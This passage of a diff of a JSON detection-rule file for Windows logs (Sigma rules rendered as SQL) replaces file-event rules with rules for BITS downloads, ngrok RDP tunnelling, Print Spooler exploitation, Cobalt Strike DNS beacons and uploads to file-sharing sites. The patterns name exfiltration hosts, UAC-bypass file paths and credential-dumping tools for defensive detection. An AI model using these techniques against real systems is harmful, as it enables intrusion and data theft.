'\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": 
"file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE 
'%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 
\" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = 
'1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program 
Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - 
"description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian 
Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": 
"file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike 
beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename 
LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": 
"2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard 
(Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": 
